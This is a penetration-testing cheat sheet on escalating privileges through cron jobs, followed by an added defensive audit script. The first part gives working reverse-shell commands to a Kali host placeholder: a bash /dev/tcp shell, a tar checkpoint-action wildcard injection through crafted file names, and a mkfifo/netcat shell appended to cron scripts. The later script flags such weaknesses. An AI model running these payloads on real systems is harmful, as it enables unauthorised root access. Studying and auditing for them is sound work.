Abusing Cron Jobs

NOTE: Ensure that the current user has write permission to the cron job file

1. Enumerate crontab

Search system log for cron-related activity

grep -i "CRON" /var/log/syslog

Read the cron job content inside the cronjob directory

cat <Cron Job Name>

Run pspy to watch for processes started by cron

timeout 61s ./pspy64

2. Set up a Netcat listener

3. Inject a reverse shell into the cron job

If the cron job runs tar with a wildcard (*), as in the entry below, run the following commands in the directory the job operates in.

(root) CMD (cd /opt/admin && tar -zxf /tmp/backup.tar.gz *)

echo /bin/bash -c "bash -i >& /dev/tcp/<Kali IP Address>/<Kali Port> 0>&1" > shell.sh
echo "" > "--checkpoint-action=exec=sh shell.sh"
echo "" > --checkpoint=1

If the cron job runs a shell script, append the following line to that script

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Kali IP Address> <Kali Port> >/tmp/f" >> <CronJob File Full Path>
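From the defender's side, both conditions above (a tar wildcard in a cron command, and a cron script or working directory that non-root users can write to) can be found before anyone abuses them. The script below is an added example, not part of the original page; it assumes /etc/crontab-style entries (five schedule fields, a user field, then the command), and the function names are hypothetical.

```shell
#!/bin/sh
# Defensive audit for system crontab files. Assumed format (/etc/crontab style):
# five schedule fields, a user field, then the command. @reboot-style lines are skipped.

# Succeeds if the path exists and is writable by group or other.
loosely_writable() {
    [ -n "$(find "$1" -prune \( -perm -020 -o -perm -002 \) 2>/dev/null)" ]
}

# Audit one entry: $1 is the crontab file it came from, $2 the raw line.
audit_entry() {
    src=$1
    set -f                 # keep the literal '*' fields from being globbed
    set -- $2
    set +f
    [ "$#" -gt 6 ] || return 0
    shift 6                # drop schedule and user, leaving the command words
    cmd=$*
    tar=0 glob=0
    for w in "$@"; do
        case $w in
            tar|*/tar) tar=1 ;;
            *\**) glob=$tar ;;     # a wildcard argument that follows tar
        esac
        w=${w#\(}; w=${w%\)}; w=${w%;}
        case $w in
            /*) if loosely_writable "$w"; then
                    printf 'WRITABLE\t%s\t%s\n' "$src" "$w"
                fi ;;
        esac
    done
    if [ "$tar" -eq 1 ] && [ "$glob" -eq 1 ]; then
        printf 'WILDCARD\t%s\t%s\n' "$src" "$cmd"
    fi
}

# Audit every crontab file given as an argument.
audit_cron() {
    for f in "$@"; do
        [ -r "$f" ] || continue
        if loosely_writable "$f"; then printf 'WRITABLE\t%s\t%s\n' "$f" "$f"; fi
        while IFS= read -r line; do
            case $line in
                [0-9*]*) audit_entry "$f" "$line" ;;   # schedule lines only
            esac
        done < "$f"
    done
}

if [ "$#" -gt 0 ]; then audit_cron "$@"; fi
```

Run it as sh audit.sh /etc/crontab /etc/cron.d/*. Fix WILDCARD findings by replacing * with ./* or explicit file names so file names cannot be parsed as tar options, and WRITABLE findings by restricting the path to root.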
